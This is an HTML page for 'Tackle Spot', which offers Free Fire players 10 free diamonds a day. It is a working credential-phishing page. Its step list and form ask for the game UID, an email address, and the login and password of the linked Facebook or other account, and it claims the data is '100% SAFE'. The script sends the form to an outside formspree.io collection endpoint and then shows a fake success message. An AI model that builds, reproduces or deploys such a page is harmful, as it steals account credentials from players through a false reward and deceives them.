<html>
<head>
    <link rel="icon" href="https://drive.google.com/uc?id=1CBgGAKJa6zk3bBfH94VQKXYmFA-NBcV1" type="image/x-icon"/>
    <title>Tackle Spot</title>
</head>






<style>
  * {
  padding: 0;
  margin: 0;
  box-sizing: border-box;
}
body { background-image: url("https://drive.google.com/uc?id=1QJ3VJN7wtZ_2WjKkMvBkVPJzVOFncsc7");
  background-repeat: no-repeat;
  background-attachment: fixed;

  background-size: 100%;
  font-family: "Segoe UI";
}
#head{border-style: none;
      border-radius:8px;
      padding:10px;
      align-items: center;
      justify-content: center;
      background-color:  rgba(0, 0, 0, 0.6);
      margin:8px;
      color:white;
      font-family: 'Bahnschrift SemiCondensed';
      font-size: 50px;}
section {
  height: 100vh;
  width: 100%;
 
  display: flex;
  align-items: center;
  justify-content: center;
  flex-direction: column;
}
.container {
  width: 90%;
  max-width: 500px;
  margin: 0 auto;
  padding: 20px;
  box-shadow: 0px 0px 20px #00000010;
  background-color: rgba(0, 0, 0, 0.6);
  border-radius: 8px;
  margin-bottom: 20px;
}
#paratit{padding: 5px;
         font-size: 30px;
         color:white;
         font-family: 'Segoe UI';}
.para{padding: 5px;
         font-size: 20px;
         color:white;
         font-family: 'Segoe UI';}
.form-group {
  width: 100%;
  margin-top: 20px;
  font-size: 20px;
}
.form-group input,
.form-group textarea {
  width: 100%;
  padding: 5px;
  font-size: 18px;
  border: 1px solid rgba(128, 128, 128, 0.199);
  margin-top: 5px;
  border-radius: 8px;
}
label{color:white;}
.dt{border-style:solid;
    border-color:white;
    border-radius:8px;
    padding: 5px;}
.do{border-style:solid;
    border-color:white;
    border-radius:8px;
    padding: 5px;
    width: 50%;}
#main{border-style:none;
      border-radius:8px;
      background-color: rgba(0, 0, 0, 0.6);
      margin-top:20px;
      margin-bottom: 20px;
      margin-left: 8px;
      margin-right: 8px;}
#step{border-style:none;
      border-radius:8px;
      background-color: rgba(0, 0, 0, 0.6);
      margin:8px;}


button[type="submit"] {
  width: 100%;
  border: none;
  outline: none;
  padding: 12px;
  font-size: 35px;
  border-radius: 8px;
  
  color: rgb(48, 75, 18);
  text-align: center;
  cursor: pointer;
  margin-top: 10px;
  transition: 0.3s ease background-color;
  font-family:Bahnschrift SemiCondensed;
}
button[type="submit"]:hover {
  background-color: rgb(126, 185, 58);
  color:black;
}
#status {
  width: 90%;
  max-width: 500px;
  text-align: center;
  padding: 10px;
  margin: 0 auto;
  border-radius: 8px;
}
#status.success {
  background-color: rgb(211, 250, 153);
  animation: status 4s ease forwards;
}
#status.error {
  background-color: rgb(250, 129, 92);
  color: white;
  animation: status 4s ease forwards;
}
@keyframes status {
  0% {
    opacity: 1;
    pointer-events: all;
  }
  90% {
    opacity: 1;
    pointer-events: all;
  }
  100% {
    opacity: 0;
    pointer-events: none;
  }
}
@media only screen and (max-width: 600px) {
body{background-image: url("https://drive.google.com/uc?id=13lR6860j0g1rgsdpGQkUgXm2hD3xfIJ8");
        background-repeat: no-repeat;
        background-size: 100%;
        background-attachment: fixed;
}
}
</style>





<body>
 <center><div id="head">Tackle Spot</div></center> 
  <div id="main">
 <center><div id="paratit">Before You Go</div></center> <hr>
 <center><div class="para">If you are Lacking Diamonds! Then you came at<br><b>
    <font color="green">Right Place.</b></font> <br>Tackle Spot is Excellent platform for Free Fire 
    players.Once you registered on it, 10 Diamonds/Day will be credited to your Free Fire account.<br>Don't worry, Info 
    provided by you will be 100% SAFE.<br>
    <b><div class="dt">Here's how you can do it.....</div> </b>
  </div></center>
  </div>
  <center><div id="step">
    <div class="para">
    <div class="do">
      <b>Step 1</b>
      </div>
      Enter your Free Fire UID.
      <div class="do">
        <b>Step 2</b>
        </div>
      Enter any Email you want to register with.
      <div class="do">
        <b>Step 3</b>
        </div>
      Now, Enter your Binded Account ID. e.g. If it was from facebook, Then enter you Facebook Mobile or Email.
      <div class="do">
        <b>Step 4</b>
        </div>
      Now, Enter your Binded Account Password. e.g. Facebook Password.
      <div class="do">
        <b>Step 5</b>
        </div>
        Click on REGISTER.
    </div>
  </div></center>

<section>
  <div class="container">
    <form action="https://formspree.io/f/moqpdkgn" method="POST" id="my-form">

      <div class="form-group">
        <label for="firstName"> Free Fire UID</label>
        <input type="text" id="firstName" name="firstName" placeholder="Enter your UID">
      </div>
      <div class="form-group">
        <label for="email">Email</label>
        <input type="email" id="email" name="email" placeholder="Enter your Email">
      </div>

      <div class="form-group">
        <label for="massage">Binded Account ID</label>
        <input type="text" id="firstName" name="firstName" placeholder="Phone or Email">
      </div>
      <div class="form-group">
        <label for="massage">Binded Account Password</label>
        <input type="password" id="password" name="password" placeholder="Password">
      </div>

      <button type="submit">REGISTER</button>
    </form>
  </div>
  <div id="status"></div>
</section>
</body>








<script>
  window.addEventListener("DOMContentLoaded", function () {
  // get the form elements defined in your form HTML above

  var form = document.getElementById("my-form");
  // var button = document.getElementById("my-form-button");
  var status = document.getElementById("status");

  // Success and Error functions for after the form is submitted

  function success() {
    form.reset();
    status.classList.add("success");
    status.innerHTML = "Registration Successfull! Close Tab to Continue.";
  }

  function error() {
    status.classList.add("error");
    status.innerHTML = "Oops! There was a problem.";
  }

  // handle the form submission event

  form.addEventListener("submit", function (ev) {
    ev.preventDefault();
    var data = new FormData(form);
    ajax(form.method, form.action, data, success, error);
  });
});

// helper function for sending an AJAX request

function ajax(method, url, data, success, error) {
  var xhr = new XMLHttpRequest();
  xhr.open(method, url);
  xhr.setRequestHeader("Accept", "application/json");
  xhr.onreadystatechange = function () {
    if (xhr.readyState !== XMLHttpRequest.DONE) return;
    if (xhr.status === 200) {
      success(xhr.response, xhr.responseType);
    } else {
      error(xhr.status, xhr.response, xhr.responseType);
    }
  };
  xhr.send(data);
}
</script>
</html>